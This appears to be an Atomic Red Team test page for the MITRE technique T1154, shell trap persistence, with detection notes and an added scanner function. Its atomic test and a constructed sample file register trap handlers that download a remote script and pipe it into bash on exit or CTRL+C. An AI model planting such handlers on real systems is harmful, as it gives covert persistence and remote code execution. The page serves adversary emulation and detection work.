T1154 - Trap

The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts, either to gain execution or as a persistence mechanism. Trap commands are of the form `trap 'command list' signals`, where "command list" will be executed when "signals" are received.

Detection: Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.
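As an added detection example (not part of the Atomic Red Team page), the shell function below scans shell startup files and scripts for `trap` registrations whose handler pipes a curl/wget download straight into an interpreter, which is the pattern the Atomic test below leaves behind. The two files it scans are constructed inline; the `example.invalid` URL is a placeholder.

```sh
#!/bin/sh
# Added detection example (not the project's own code).
# Flags trap registrations whose handler pipes a curl/wget download into a shell.

# A trap registration: "trap" followed by a quoted handler (skips "trap -l", "trap -p").
TRAP_RE="(^|[;&|[:space:]])trap[[:space:]]+['\"]"
# A handler that downloads something and pipes it straight into an interpreter.
FETCH_EXEC_RE='(curl|wget)[^|]*[|][[:space:]]*(nohup[[:space:]]+)?(ba|z|k|da)?sh([^[:alnum:]_]|$)'

# find_suspicious_traps FILE...
# Prints "file:line:text" for each suspicious trap; returns 0 if any were found, 1 otherwise.
find_suspicious_traps() {
    status=1
    for f in "$@"; do
        [ -r "$f" ] || continue
        hits=$(grep -nE "$TRAP_RE" "$f" 2>/dev/null | grep -E "$FETCH_EXEC_RE" || true)
        if [ -n "$hits" ]; then
            printf '%s\n' "$hits" | while IFS= read -r line; do
                printf '%s:%s\n' "$f" "$line"
            done
            status=0
        fi
    done
    return "$status"
}

# Constructed sample files standing in for a user's startup file and a normal script.
SAMPLE_DIR=$(mktemp -d)
SUSPECT_FILE="$SAMPLE_DIR/bashrc"
BENIGN_FILE="$SAMPLE_DIR/backup.sh"
cat >"$SUSPECT_FILE" <<'EOF'
export PATH="$HOME/bin:$PATH"
trap 'nohup curl -sS https://example.invalid/payload.sh | bash' EXIT
EOF
cat >"$BENIGN_FILE" <<'EOF'
tmp=$(mktemp)
trap 'rm -f "$tmp"' EXIT INT TERM
curl -sS https://example.invalid/status > "$tmp"
EOF

# Typical sweep: the constructed samples plus the files a login shell reads on this host.
find_suspicious_traps "$SUSPECT_FILE" "$BENIGN_FILE" \
    "$HOME/.bashrc" "$HOME/.profile" /etc/profile /etc/bash.bashrc
```

Only the constructed `bashrc` line is reported; the cleanup trap in `backup.sh` is not, because its handler never pipes into an interpreter.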

Platforms: Linux, macOS

Data Sources: File monitoring, Process Monitoring, Process command-line parameters

Permissions Required: User, Administrator

Remote Support: No

Atomic Tests


Atomic Test #1 - Trap

After exiting the shell, the script will download and execute.

After sending a keyboard interrupt (CTRL+C) the script will download and execute.

Supported Platforms: macOS, CentOS, Ubuntu, Linux

Run it with sh!

```sh
# EXIT trap: the handler runs when the shell exits
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
exit
# INT trap: the handler runs on a keyboard interrupt (CTRL+C)
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT
```